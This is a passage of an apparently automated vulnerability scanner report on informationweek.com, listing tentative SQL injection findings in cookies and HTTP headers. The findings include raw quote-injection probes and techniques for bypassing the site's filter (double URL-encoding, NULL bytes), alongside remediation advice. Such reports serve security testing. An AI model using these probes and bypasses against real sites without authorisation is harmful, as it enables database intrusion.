Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:03 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:03 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001''&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.32. http://www.informationweek.com/video/security/81784308001 [s_lv cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/81784308001

Issue detail

The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_lv cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /video/security/81784308001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%2527; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:48 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:48 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68383


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/81784308001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%2527%2527; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:49 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:49 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.33. http://www.informationweek.com/video/security/81784308001 [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/81784308001

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /video/security/81784308001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68289


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/81784308001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:12 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:12 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.34. http://www.informationweek.com/whitepaper/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:28 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:28 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 70366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror">
...[SNIP]...

Request 2

GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:23:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.35. http://www.informationweek.com/whitepaper/ [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 70361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror">
...[SNIP]...

Request 2

GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:57 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:57 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.36. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.37. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [ebNewBandWidth_.www.informationweek.com cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460

Issue detail

The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ebNewBandWidth_.www.informationweek.com cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%2527; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:16 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:16 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%2527%2527; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:18 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:18 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.38. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [iwkbtn_101201 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460

Issue detail

The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:00 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:00 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.39. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [iwkbtn_emc_101111 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525

Issue detail

The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:57 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:57 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
<a href="/whitepaper/Security/Cyber-Terror" class="business">
...[SNIP]...

Request 2

GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:58 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:58 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


